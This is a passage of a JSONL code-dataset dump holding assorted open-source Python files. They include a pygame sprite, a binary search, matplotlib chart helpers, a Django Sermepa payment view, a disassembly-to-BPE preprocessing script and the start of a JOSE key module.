\n# Then call the brake method five times. \n\ndef TestCar():\n \n ui = UI()\n\n vroom = Car(1980, \"Ford Capri 2.8i\")\n \n #call the methods in order\n \n ui.red_light()\n ui.yellow_light()\n ui.green_light()\n ui.car_sfx()\n ui.roadway()\n\n for i in range(5):\n vroom.accelerate()\n vroom.up_speed()\n\n for i in range(5):\n vroom.brake()\n vroom.down_speed()\n \n vroom.car_stop() \n ui.roadway()\n \nTestCar()","repo_name":"rei-kaizen/data-abstraction-encapsulation","sub_path":"car/test_car.py","file_name":"test_car.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32440651076","text":"\"\"\"empty message\n\nRevision ID: f610bf799e52\nRevises: \nCreate Date: 2021-11-03 13:18:46.531200\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport random\nimport string\n\n\n# revision identifiers, used by Alembic.\nrevision = 'f610bf799e52'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\ndef get_random_string(length = 16):\n characters = string.ascii_letters + string.digits + string.punctuation\n characters = characters.replace('\"', '').replace(\"'\", \"\").replace('`', '')\n return ''.join(random.choice(characters) for i in range(length))\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n example_table = op.create_table('Examples',\n sa.Column('IdExample', sa.Integer(), nullable=False),\n sa.Column('Description', sa.String(255), nullable=False),\n sa.PrimaryKeyConstraint('IdExample')\n )\n op.bulk_insert(example_table, [\n {\"Description\": get_random_string(random.randint(8, 20))} for i in range(200)\n ])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('Examples')\n # ### end Alembic commands ###\n","repo_name":"DavidCuy/flask-pattern","sub_path":"code/{{cookiecutter.directory_name}}/migrations/versions/f610bf799e52_.py","file_name":"f610bf799e52_.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7448579313","text":"\"\"\"\n二分查找\n必须是有序数组\n时间复杂度:O(logn)\n\n算法思想:\n1、获取数组中间位置-mid\n2、拿待查找值和中间值比较,如果\n\"\"\"\n\n\ndef binary_search(sorted_array, val):\n if not sorted_array:\n return -1\n\n beg = 0\n end = len(sorted_array) - 1\n\n while beg <= end:\n # 计算数组中间位置\n mid = int((beg + end) / 2) # beg + (end-beg)/2\n\n if sorted_array[mid] == val:\n return mid\n elif sorted_array[mid] > val:\n end = mid - 1\n else:\n beg = mid + 1\n\n return -1\n\n\ndef test_binary_search():\n # assert 0\n a = list(range(10))\n\n # 如何设置测试用例:(正常值、异常值、边界值)\n\n # 正常值\n assert binary_search(a, 1) == 1\n\n # 异常值\n assert binary_search(None, 1) == -1\n assert binary_search(a, -1) == -1\n\n # 边界值\n assert binary_search(a, 0) == 0\n\n # TDD,测试驱动开发\n","repo_name":"yanshugang/study_data_structures_and_algorithms","sub_path":"search_algorithms/s01_binary_search.py","file_name":"s01_binary_search.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"452443389","text":"# -*- coding: utf-8 -*-\nimport textdistance\nfrom .phonetize import translit\nimport re\n\n\ndef compute_distance(text1, text2, algorithm='damerau_levenshtein',\n normalize=True, qval=1):\n\n algorithm = algorithm.lower()\n\n text1 = translit(text1) \n text2 = translit(text2)\n\n def name_error():\n raise NameError('You have entered the wrong algorithm name.\\n'\n 'Possible values: \"hamming\", \"levenshtein\", '\n '\"damerau_levenshtein\" (default), \"jaro\", '\n '\"jaro_winkler\", \"gotoh\", \"smith_waterman\"')\n\n return getattr(getattr(textdistance,\n 'Hamming' if algorithm == 'hamming' else\n 'Levenshtein' if algorithm == 'levenshtein' else\n 'DamerauLevenshtein' if algorithm == 'damerau_levenshtein' else\n 'Jaro' if algorithm == 'jaro' else\n 'JaroWinkler' if algorithm == 'jaro_winkler' else\n 'SmithWaterman' if algorithm == 'smith_waterman' else\n name_error()\n )(qval=qval), 'normalized_distance' if normalize else 'distance')(text1,\n text2)\n","repo_name":"fostroll/phonetized_ner_srv","sub_path":"srv/app/lib/text_distance.py","file_name":"text_distance.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30781066405","text":"import os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\nfrom utils.emoji import EMOJI_FOLDER\nfrom utils.other import counter\n\nWIDTH = 1/1.5\n\n##### utils #####\n\ndef _rl(a):\n\treturn range(len(a))\n\n##### general #####\n\ndef pie(data, labels=None, title=None, legend=True, legend_title=None, axis=\"equal\", **kwargs):\n\tif labels:\n\t\tplt.pie(data, labels=labels)\n\telse:\n\t\tplt.pie(data)\n\n\tif title:\n\t\tplt.title(title)\n\n\n\tif legend:\n\t\tif legend_title:\n\t\t\tplt.legend(title=legend_title)\n\t\telse:\n\t\t\tplt.legend()\n\t\t\t\n\tif axis:\n\t\tplt.axis(axis)\t\n\n\tplt.show()\n\ndef bar(data, names=None, color=\"blue\", title=None, axis=None, show=True):\n\t# create a bar \n\tplt.bar(_rl(data), data, WIDTH, color=color)\n\n\t# sending an empty list (which erases the xticks) is allowed\n\tif names is not None:\n\t\t# plt.xticks(_rl(data) + WIDTH*0.5, names)\n\t\tplt.xticks(_rl(data), names)\n\n\tif title:\n\t\tplt.title(title)\n\n\tif axis:\n\t\tif type(axis) is list:\n\t\t\tplt.axis(axis)\n\t\tif type(axis) is type(lambda x:x):\n\t\t\tplt.axis(axis(plt.axis()))\n\n\t# mpl.rc('font', family='Arial')\n\t# mpl.rc('font', **{\n\t# \t'sans-serif' : 'Arial',\n\t# \t'family' : 'sans-serif'\n\t# })\n\n\tif show:\n\t\tplt.show()\n\ndef bar_2(data, names=[None, None], color=[\"blue\", \"red\"], title=[\"left\", \"right\"], axis=None):\n\tplt.subplot(1,2,1) # rows, columns, plot number\n\tbar(\n\t\tdata=data[0],\n\t\tnames=names[0],\n\t\tcolor=color[0],\n\t\ttitle=title[0],\n\t\taxis=axis,\n\t\tshow=False\n\t)\n\tplt.subplot(1,2,2) # rows, columns, plot number\n\tbar(\n\t\tdata=data[1],\n\t\tnames=names[1],\n\t\tcolor=color[1],\n\t\ttitle=title[1],\n\t\taxis=axis,\n\t\tshow=True\n\t)\n\ndef hist(data, **kwargs):\n\t# data should be a list\n\t# create a dict of how many times each object appears\n\tif type(data) is not list:\n\t\treturn(bool(print(\"data should be a list!\")))\n\tif type(data[0]) is list or type(data[0]) is tuple:\n\t\tc = data\n\telif \"__iter__\" in dir(data[0]) and type(data[0]) is not str:\n\t\tc = [list(i) for i in data]\n\telse:\n\t\tc = counter(data)\n\n\tif \"sort\" in kwargs:\n\t\tif kwargs[\"sort\"].lower() == \"counter\":\n\t\t\tc.sort(key=lambda x: x[1])\n\t\telse:\n\t\t\tc.sort(key=kwargs[\"sort\"])\n\t\tkwargs.pop(\"sort\")\n\n\tif \"amount\" in kwargs:\n\t\tc = c[-kwargs[\"amount\"]:]\n\t\tkwargs.pop(\"amount\")\n\n\tif \"map\" in kwargs:\n\t\tc = list(map(kwargs[\"map\"], c))\n\t\tkwargs.pop(\"map\")\n\n\treturn bar([i[1] for i in c], names=[i[0] for i in c], **kwargs)\n\ndef hist_2(data, color=[\"blue\", \"red\"], title=[\"left\", \"right\"], **kwargs):\n\t# data needs to be a list of (emoji_unicode_id, amount)\n\n\tif \"sort\" in kwargs:\n\t\tif kwargs[\"sort\"].lower() == \"counter\":\n\t\t\tdata[0].sort(key=lambda x: x[1])\n\t\t\tdata[1].sort(key=lambda x: x[1])\n\t\telse:\n\t\t\tdata[0].sort(key=kwargs[\"sort\"])\n\t\t\tdata[1].sort(key=kwargs[\"sort\"])\n\t\tkwargs.pop(\"sort\")\n\n\tif \"amount\" in kwargs:\n\t\tdata[0] = data[0][-kwargs[\"amount\"]:]\n\t\tdata[1] = data[1][-kwargs[\"amount\"]:]\n\t\tkwargs.pop(\"amount\")\n\n\tif \"map\" in kwargs:\n\t\tdata[0] = list(map(kwargs[\"map\"], data[0]))\n\t\tdata[1] = list(map(kwargs[\"map\"], data[1]))\n\t\tkwargs.pop(\"map\")\n\n\t# data_names is used to display the emojis, it can be joined\n\tdata_names = [i[0] for i in data[0]] + [i[0] for i in data[1]]\n\t# data_amount is used to display the bar graph for each user\n\tdata_amount = [\n\t\t[i[1] for i in data[0]],\n\t\t[i[1] for i in data[1]]\n\t]\n\tcolumns = len(data[0]) + len(data[1])\n\n\tbar(\n\t\tdata=data_amount[0] + [0]*len(data_amount[1]),\n\t\tnames=data_names,\n\t\tcolor=color[0],\n\t\t\n\t\tshow=False\n\t)\n\t\n\tbar(\n\t\tdata=[0]*len(data_amount[0]) + data_amount[1],\n\t\tnames=data_names,\n\t\tcolor=color[1],\n\t\ttitle=\" - \".join(title),\n\t\tshow=True\n\t)\n\n\n##### emoji #####\n\nMAX_EMOJI_AMOUNT = 10\ndef _fit_axis(x):\n\treturn [\n\t\tx[0], # x-min\n\t\tx[1] - (1-WIDTH), # x-max\n\t\t# each bar-column gets '1' size, and its width is WIDTH. Thus, there is a (1-WIDTH) margin left at the end\n\t\tx[2], # y-min\n\t\tx[3] # y-max\n\t]\ndef emoji_bar(data, **kwargs):\n\t# data needs to be a list of (emoji_unicode_id, amount)\n\n\tif \"sort\" in kwargs:\n\t\tif type(kwargs[\"sort\"]) is str \\\n\t\t\tand kwargs[\"sort\"].lower() == \"counter\":\n\t\t\tdata.sort(key=lambda x: x[1])\n\t\telse:\n\t\t\tdata.sort(key=kwargs[\"sort\"])\n\t\tkwargs.pop(\"sort\")\n\n\tif \"amount\" in kwargs:\n\t\tdata = data[-kwargs[\"amount\"]:]\n\t\tkwargs.pop(\"amount\")\n\n\tif \"map\" in kwargs:\n\t\tdata = list(map(kwargs[\"map\"], data))\n\t\tkwargs.pop(\"map\")\n\n\tif len(data) > MAX_EMOJI_AMOUNT:\n\t\treturn(bool(print(\"len(data) is bigger than MAX_EMOJI_AMOUNT (%s)\" % MAX_EMOJI_AMOUNT)))\n\n\tif \"emoji_path\" in kwargs:\n\t\tEMOJI_PATH = kwargs[\"emoji_path\"]\n\t\tkwargs.pop(\"emoji_path\")\n\telse:\n\t\tEMOJI_PATH = EMOJI_FOLDER + \"/%s.png\"\n\n\tdata_names = [i[0] for i in data]\n\tdata_amount = [i[1] for i in data]\n\tcolumns = len(data)\n\n\t# safety\n\tif not all(map(lambda x: os.path.exists(EMOJI_PATH % x), data_names)):\n\t\treturn(bool(print(\"Invalid emoji unicode-id given!\")))\n\n\t# plot emojis\n\tfor i in range(len(data)):\n\t\t# read the image of the emoji\n\t\timg = mpimg.imread(EMOJI_PATH % data_names[i])\n\t\tplt.subplot(\n\t\t\tMAX_EMOJI_AMOUNT, # amount of rows\n\t\t\tcolumns, # amount of columns\n\t\t\t1 + ( columns * (MAX_EMOJI_AMOUNT-1) ) + i # plot number\n\t\t\t# 1 based + all the rows except the last one + the index in the last row\n\t\t)\n\t\tplt.imshow(img)\n\t\tplt.axis(\"off\")\n\n\t# plot the bar graph\n\t# focus on all the columns and on all the rows but the last one\n\tplt.subplot(MAX_EMOJI_AMOUNT,1,(1,MAX_EMOJI_AMOUNT-1))\n\n\treturn bar(\n\t\tdata=data_amount,\n\t\tnames=[], # remove the x-axis labels\n\t\ttitle=\"EMOJI!!!\",\n\t\taxis=_fit_axis\n\t)\n\ndef emoji_bar_2(data, color=[\"blue\", \"red\"], title=[\"left\", \"right\"], **kwargs):\n\t# data needs to be a list of (emoji_unicode_id, amount)\n\n\tif \"sort\" in kwargs:\n\t\tif type(kwargs[\"sort\"]) is str \\\n\t\t\tand kwargs[\"sort\"].lower() == \"counter\":\n\t\t\tdata[0].sort(key=lambda x: x[1])\n\t\t\tdata[1].sort(key=lambda x: x[1])\n\t\telse:\n\t\t\tdata[0].sort(key=kwargs[\"sort\"])\n\t\t\tdata[1].sort(key=kwargs[\"sort\"])\n\t\tkwargs.pop(\"sort\")\n\n\tif \"amount\" in kwargs:\n\t\tdata[0] = data[0][-kwargs[\"amount\"]:]\n\t\tdata[1] = data[1][-kwargs[\"amount\"]:]\n\t\tkwargs.pop(\"amount\")\n\n\tif \"map\" in kwargs:\n\t\tdata[0] = list(map(kwargs[\"map\"], data[0]))\n\t\tdata[1] = list(map(kwargs[\"map\"], data[1]))\n\t\tkwargs.pop(\"map\")\n\n\tif len(data[0]) + len(data[1]) > MAX_EMOJI_AMOUNT:\n\t\treturn(bool(print(\"len(data[0+1]) is bigger than MAX_EMOJI_AMOUNT (%s)\" % MAX_EMOJI_AMOUNT)))\n\n\tif \"emoji_path\" in kwargs:\n\t\tEMOJI_PATH = kwargs[\"emoji_path\"]\n\t\tkwargs.pop(\"emoji_path\")\n\telse:\n\t\tEMOJI_PATH = EMOJI_FOLDER + \"/%s.png\"\n\n\t# data_names is used to display the emojis, it can be joined\n\tdata_names = [i[0] for i in data[0]] + [i[0] for i in data[1]]\n\t# data_amount is used to display the bar graph for each user\n\tdata_amount = [\n\t\t[i[1] for i in data[0]],\n\t\t[i[1] for i in data[1]]\n\t]\n\tcolumns = len(data[0]) + len(data[1])\n\n\t# safety\n\tif not all(map(lambda x: os.path.exists(EMOJI_PATH % x), data_names)):\n\t\treturn(bool(print(\"Invalid emoji unicode-id given!\")))\n\n\t# plot emojis\n\tfor i in range(columns):\n\t\t# read the image of the emoji\n\t\timg = mpimg.imread(EMOJI_PATH % data_names[i])\n\t\tplt.subplot(\n\t\t\tMAX_EMOJI_AMOUNT, # amount of rows\n\t\t\tcolumns, # amount of columns\n\t\t\t1 + ( columns * (MAX_EMOJI_AMOUNT-1) ) + i # plot number\n\t\t\t# 1 based + all the rows except the last one + the index in the last row\n\t\t)\n\t\tplt.imshow(img)\n\t\tplt.axis(\"off\")\n\n\t# plot the bar graph\n\tplt.subplot(MAX_EMOJI_AMOUNT,1,(1,MAX_EMOJI_AMOUNT-1))\n\n\tbar(\n\t\tdata=data_amount[0] + [0]*len(data_amount[1]),\n\t\tnames=[], # remove the x-axis labels\n\t\tcolor=color[0],\n\t\t\n\t\tshow=False\n\t)\n\t\n\tbar(\n\t\tdata=[0]*len(data_amount[0]) + data_amount[1],\n\t\tnames=[], # remove the x-axis labels\n\t\tcolor=color[1],\n\t\ttitle=\" - \".join(title),\n\t\tshow=True\n\t)\n\n##### dates #####\n\nSUPPORTED_HOURS_DELTA = [0.5, 1, 2]\nDAYS = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\nMONTHS = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\n\ndef _filter_dates(data, start, end):\n\t\"data = wp.d.lines\"\n\tif \"__iter__\" in dir(data[0]):\n\t\tdata = map(lambda x:x[0], data)\n\n\tif start and end:\n\t\treturn [i for i in data if start <= i < end]\n\telif start and not end:\n\t\treturn [i for i in data if start <= i ]\n\telif not start and end:\n\t\treturn [i for i in data if i < end]\n\telse:\n\t\treturn [i for i in data if i ]\n\ndef hours(data, delta=0.5, start=None, end=None):\n\t\"data = wp.d.lines\"\n\tif delta not in SUPPORTED_HOURS_DELTA:\n\t\treturn(bool(print(\"Unsupported hour delta\")))\n\n\t# create a list of all the hours with apropriate delta\n\tminutes_groups = [0] * int(24. / delta)\n\n\tfor i in _filter_dates(data, start, end):\n\t\tminutes_groups[\n\t\t\t(i.minute + i.hour * 60)\n\t\t\t //\n\t\t\tint(60 * delta)\n\t\t] += 1\n\n\tif delta == 0.5:\n\t\t# minutes_groups_titles = [\n\t\t# \t\"%02d\" % (i // 2)\n\t\t# \t +\n\t\t# \t(\":30\" if i % 2 else \":00\")\n\t\t# \tfor i in range(48)\n\t\t# ]\n\t\tminutes_groups_titles = [\n\t\t\t(\n\t\t\t\t'.5'\n\t\t\t\t if\n\t\t\t\ti % 2\n\t\t\t\t else\n\t\t\t\t\"%02d\" % (i * delta)\n\t\t\t)\n\t\t\tfor i in range(48)\n\t\t]\n\telif delta == int(delta):\n\t\tminutes_groups_titles = [\n\t\t\t\"%02d:00\" % (i * delta)\n\t\t\tfor i in range(24 // delta)\n\t\t]\n\n\treturn bar(minutes_groups, minutes_groups_titles, title=\"Hours\")\n\ndef days(data, start=None, end=None):\n\t\"data = wp.d.lines\"\n\tweekday = [0]*7\n\tfor i in _filter_dates(data, start, end):\n\t\tweekday[i.weekday()] += 1\n\n\treturn bar(weekday, DAYS, title=\"Weekdays\")\n\ndef months(data, start=None, end=None):\n\t\"data = wp.d.lines\"\n\tmonths = [0]*12\n\tfor i in _filter_dates(data, start, end):\n\t\tmonths[i.month - 1] += 1\n\n\treturn bar(months, MONTHS, title=\"Months\")\n","repo_name":"dor2727/Whatsapp","sub_path":"utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":9348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11536803646","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport django_filters\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.sites.models import Site\nfrom django.db.models import Sum\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response, redirect\nfrom django.urls import reverse\nfrom django.utils.translation import gettext as _\nfrom django.views.decorators.clickjacking import xframe_options_exempt\nfrom django.views.generic import UpdateView\nfrom django_filters.views import FilterView\nfrom helpers import FilterMixin\n\nfrom core.filters.LabeledOrderingFilter import LabeledOrderingFilter\nfrom core.filters.SearchFilter import SearchFilter\nfrom core.forms.BootstrapForm import BootstrapForm\nfrom core.mixins.AjaxTemplateResponseMixin import AjaxTemplateResponseMixin\nfrom core.mixins.ExportAsCSVMixin import ExportAsCSVMixin\nfrom core.mixins.ListItemUrlMixin import ListItemUrlMixin\nfrom core.mixins.ModelFieldsViewMixin import ModelFieldsViewMixin\nfrom payments.forms.FeeComment import FeeCommentForm\nfrom payments.forms.payment import PaymentForm, UpdatePaymentForm\nfrom payments.models import PendingPayment, CardPayment\nfrom sermepa.forms import SermepaPaymentForm\nfrom sermepa.models import SermepaIdTPV\nfrom sermepa.signals import payment_was_successful, payment_was_error, signature_error\n\n\ndef generate_payment_form(payment_uuid, URL_params=''):\n site = Site.objects.get_current()\n merchant_data = 0\n trans_type = '0'\n card_payment, already_paid = PendingPayment.objects.get_card_payment(reference=payment_uuid)\n\n if already_paid:\n return True, None, None\n\n if card_payment:\n merchant_data = card_payment.pk\n amount = int(card_payment.amount * 100)\n else:\n return False, None, None\n\n # Redirect to local processor if we are in debug\n view_OK = 'sermepa_ipn' if settings.SERMEPA_DEBUG else 'payments:payment_success'\n view_KO = 'sermepa_ipn' if settings.SERMEPA_DEBUG else 'payments:payment_error'\n\n sermepa_dict = {\n \"Ds_Merchant_Titular\": card_payment.account.display_name,\n \"Ds_Merchant_MerchantData\": merchant_data,\n \"Ds_Merchant_MerchantName\": settings.SERMEPA_MERCHANT_NAME,\n \"Ds_Merchant_ProductDescription\": card_payment.concept,\n \"Ds_Merchant_Amount\": amount,\n \"Ds_Merchant_Terminal\": settings.SERMEPA_TERMINAL,\n \"Ds_Merchant_MerchantCode\": settings.SERMEPA_MERCHANT_CODE,\n \"Ds_Merchant_Currency\": settings.SERMEPA_CURRENCY,\n \"Ds_Merchant_MerchantURL\": \"https://%s%s\" % (site.domain, reverse('sermepa_ipn')),\n \"Ds_Merchant_UrlOK\": \"https://%s%s\" % (site.domain, reverse(view_OK)) + URL_params,\n \"Ds_Merchant_UrlKO\": \"https://%s%s\" % (site.domain, reverse(view_KO)) + URL_params,\n }\n\n order = SermepaIdTPV.objects.new_idtpv()\n sermepa_dict.update({\n \"Ds_Merchant_Order\": order,\n \"Ds_Merchant_TransactionType\": trans_type,\n })\n form = SermepaPaymentForm(initial=sermepa_dict, merchant_parameters=sermepa_dict)\n\n return False, card_payment, form\n\n\n\n@xframe_options_exempt\ndef form(request, uuid):\n\n # print \"http://%s%s\" % (site.domain, reverse('sermepa_ipn'))\n params = '' if not 'from_app' in request.GET else '?from_app=true'\n\n payment = PendingPayment.objects.filter(reference=uuid).first()\n if payment and payment.completed:\n return HttpResponse(render_to_response('payments/pay_form_paid.html',\n {'request': request, 'uuid': uuid, 'payment': payment}))\n\n paid, card_payment, form = generate_payment_form(uuid, URL_params=params)\n if paid:\n return HttpResponse(render_to_response('payments/pay_form_paid.html',\n {'request': request, 'uuid': uuid, 'payment': payment,\n 'card_payment': card_payment}))\n\n return HttpResponse(render_to_response('payments/pay_form.html',\n {'request': request, 'uuid': uuid, 'payment': payment, 'form': form,\n 'card_payment': card_payment, 'debug': settings.SERMEPA_DEBUG}))\n\n\n@xframe_options_exempt\ndef payment_success(request):\n return HttpResponse(render_to_response('payments/end.html', {}))\n\n@xframe_options_exempt\ndef payment_error(request):\n return HttpResponse(render_to_response('payments/error.html', {}))\n\n\ndef payment_ok(sender, **kwargs):\n print('Payment ok!')\n PendingPayment.objects.process_sermepa_payment(sender)\n\n\ndef payment_ko(sender, **kwargs):\n print('Payment bad!')\n\n\ndef sermepa_ipn_error(sender, **kwargs):\n print('ipn error!')\n\n\npayment_was_successful.connect(payment_ok)\npayment_was_error.connect(payment_ko)\nsignature_error.connect(sermepa_ipn_error)","repo_name":"Mercado-Social-de-Madrid/gestionMES","sub_path":"payments/views/sermepa_form.py","file_name":"sermepa_form.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"25652401113","text":"import pygame\n\nclass Ship():\n def __init__(self, main_game):\n super().__init__()\n \n self.screen = main_game.screen\n self.screen_rect = main_game.screen.get_rect()\n\n self.image = pygame.image.load('./img/ship.png')\n self.rect = self.image.get_rect()\n self.rect.midleft = self.screen_rect.midleft\n\n self.y = float(self.rect.y)\n self.ship_speed = 1.2\n\n self.moving_up = False\n self.moving_down = False\n\n\n def update(self):\n if self.moving_up and self.rect.top > 0:\n self.y -= self.ship_speed\n if self.moving_down and self.rect.bottom < self.screen_rect.bottom:\n self.y += self.ship_speed\n \n self.rect.y = self.y\n\n\n def blitme(self):\n self.screen.blit(self.image, self.rect)","repo_name":"nlarrea/apuntes-de-python","sub_path":"EJERCICIOS/12_creating_games/04_tirador_lateral/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22990920488","text":"import os\nimport util\nimport unit\nfrom capstone import *\nfrom tqdm import tqdm\n\nclass Dump():\n def __init__(self, binary_name, dmp_path):\n self.dmp_path = dmp_path\n self.binary_name = binary_name\n \n self.funcs = util.load_from_dmp(self.dmp_path)\n print(binary_name)\n # print(self.funcs)\n \n self.md = Cs(CS_ARCH_X86, CS_MODE_64)\n self.func_dict = dict()\n self.build_text()\n \n \n def build_text(self):\n f_addrs = sorted(self.funcs.keys())\n # print(f_addrs)\n \n # bar = util.ProgressBar(len(f_addrs), name=\"Creating Plain Text...:\")\n for f_idx, f_addr in enumerate(f_addrs):\n F = self.funcs[f_addr]\n # print(F)\n self.func_dict[F.name] = []\n if not F.is_linker_func:\n bb_addrs = sorted(F.bbls.keys())\n for bb_addr in bb_addrs:\n BB = F.bbls[bb_addr]\n instn_addrs = sorted(BB.instns.keys())\n \n for instn_addr in instn_addrs:\n I = BB.instns[instn_addr]\n # print(I.cs_instr)\n # print([x for x in self.md.disasm(I.raw_bytes, 0x0)][0])\n cs_instr = [x for x in self.md.disasm(I.raw_bytes, 0x0)][0]\n if not cs_instr or cs_instr.mnemonic == 'nop':\n continue\n \n opcode = cs_instr.mnemonic\n operands = cs_instr.op_str\n if operands == '':\n instruction = opcode\n else:\n instruction = opcode + ' ' + operands\n instruction = instruction.replace(' + ', '+')\n instruction = instruction.replace(' - ', '-')\n instruction = instruction.replace(',', '')\n instruction = instruction.replace(' ', '_')\n # print(instruction)\n self.func_dict[F.name].append(instruction)\n # bar += 1\n with open(\"./dataset/plain_source.txt\", mode='a', encoding='utf-8') as f:\n for func in tqdm(self.func_dict):\n f.write(', '.join(self.func_dict[func]) + '\\n')\n \n with open(\"./dataset/test_target.txt\", mode='a', encoding='utf-8') as f:\n for func in tqdm(self.func_dict):\n name = func.replace(\"__\", \"\")\n name = name.replace(\"_\", \" \")\n # if first char is space, remove it\n if name[0] == ' ':\n name = name[1:]\n f.write(name + '\\n')\n \n \n \n\n\n\nif __name__ == \"__main__\":\n # delete ./dataset/test_source.txt and ./dataset/test_target.txt at start\n if os.path.exists(\"./dataset/plain_source.txt\"):\n os.remove(\"./dataset/plain_source.txt\")\n if os.path.exists(\"./dataset/test_source.txt\"):\n os.remove(\"./dataset/test_source.txt\")\n if os.path.exists(\"./dataset/test_target.txt\"):\n os.remove(\"./dataset/test_target.txt\")\n binary_dir = \"./target_binary\"\n \n for root, dirs, files in os.walk(binary_dir):\n for file in files:\n \n # if ends with .dmp.gz\n binname, ext = os.path.splitext(file)\n if ext == '.gz':\n binname, _ = os.path.splitext(binname)\n print(binname, file)\n Dump(binname, os.path.join(root, file))\n \n ## run bpe\n # cmd: subword-nmt apply-bpe --codes ../vocab/pretrained_bpe_voca.voc --input ./dataset/plain_source.txt --output ./dataset/test_source.txt\n \n # os.system(\"subword-nmt apply-bpe --codes ../vocab/pretrained_bpe_voca.voc --input ./dataset/plain_source.txt --output ./dataset/test_source.txt\")\n os.system(\"subword-nmt apply-bpe --codes ./vocab/pretrained_bpe_voca.voc --input ./ida_preprocessing/dataset/plain_source.txt --output ./dataset/test_source.txt\")\n ","repo_name":"wldyd423/AsmDepictor","sub_path":"ida_preprocessing/simple_bpe_normalization.py","file_name":"simple_bpe_normalization.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"14214416268","text":"#==============================================================================\n# trans = {'0':'ling', '1':'yi', '2':'er', '3':'san', '4': 'si',\n# '5':'wu', '6':'liu', '7':'qi', '8':'ba', '9':'jiu', '10': 'shi'}\n# \n# def convert_to_mandarin(us_num):\n# '''\n# us_num, a string representing a US number 0 to 99\n# returns the string mandarin representation of us_num\n# '''\n# int_num = int(us_num)\n# str_num = ''\n# \n# if int_num > 10 and int_num < 20:\n# str_num += trans['10'] + ' ' + trans[str(int_num % 10)]\n# elif int_num > 19 and int_num < 100:\n# tens = int_num // 10\n# ones = int_num % 10\n# str_num += trans[str(tens)] + ' ' + trans['10']\n# if not ones == 0:\n# str_num += ' ' + trans[str(ones)]\n# else:\n# str_num = trans[us_num]\n# \n# return str_num\n#==============================================================================\n\n\ndef longest_run(L):\n \"\"\"\n Assumes L is a list of integers containing at least 2 elements.\n Finds the longest run of numbers in L, where the longest run can\n either be monotonically increasing or monotonically decreasing. \n In case of a tie for the longest run, choose the longest run \n that occurs first.\n Does not modify the list.\n Returns the sum of the longest run. \n \"\"\"\n current_streak = 0\n longest_streak = 0 \n current_start = 0\n longest_start = 0\n \n for i in range(1,len(L)):\n if L[i] >= L[i-1]:\n current_streak += 1\n if current_streak > longest_streak:\n longest_streak = current_streak\n longest_start = current_start\n else:\n current_streak = 0\n current_start = i\n \n sum = 0\n for i in range(longest_start, longest_start + longest_streak + 1):\n sum += L[i]\n ascending = (sum, longest_start, longest_streak)\n\n\n current_streak = 0\n longest_streak = 0 \n current_start = 0\n longest_start = 0\n \n for i in range(1,len(L)):\n if L[i] <= L[i-1]:\n current_streak += 1\n if current_streak > longest_streak:\n longest_streak = current_streak\n longest_start = current_start\n else:\n current_streak = 0\n current_start = i\n \n sum = 0\n for i in range(longest_start, longest_start + longest_streak + 1):\n sum += L[i]\n descending = (sum, longest_start, longest_streak)\n \n if(ascending[0] > descending[0]):\n return ascending[0]\n else:\n return descending[0]\n \n \n \n \n \nprint(str(longest_run([1, 2, 3, 4, 5, 6, 7, 8, 9])) + \" 45\")\nprint(str(longest_run([1, 2, 3, 2, 1])) + \" 6\") \nprint(str(longest_run([3, 2, 1, 2, 3])) + \" 6\") \nprint(str(longest_run([1, 2, 1, 2, 1, 2, 1, 2, 1])) + \" 3\") \nprint(str(longest_run([1, 2, 3, 4, 5, 0, 10, 1, 2, 3, 4, 5])) + \" 15\") #15\nprint(str(longest_run([1, 2, 3, 10, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1])) + \" 65\")\n\n","repo_name":"pabaier/classes-student","sub_path":"6001/FinalExam/finalExam.py","file_name":"finalExam.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8706746111","text":"import typing as t\nfrom ._keys import (\n JWKRegistry,\n KeySet,\n OctKey,\n RSAKey,\n ECKey,\n OKPKey,\n Key,\n)\nfrom .rfc8812 import register_secp256k1\nfrom .registry import Header\n\n\n__all__ = [\n \"JWKRegistry\",\n \"Key\",\n \"KeyCallable\",\n \"KeyFlexible\",\n \"OctKey\",\n \"RSAKey\",\n \"ECKey\",\n \"OKPKey\",\n \"KeySet\",\n \"guess_key\",\n]\n\nregister_secp256k1()\n\n\nclass GuestProtocol(t.Protocol): # pragma: no cover\n def headers(self) -> Header:\n ...\n\n def set_kid(self, kid: str) -> None:\n ...\n\n\nKeyCallable = t.Callable[[GuestProtocol], Key]\nKeyFlexible = t.Union[str, bytes, Key, KeySet, KeyCallable]\n\n\ndef guess_key(key: KeyFlexible, obj: 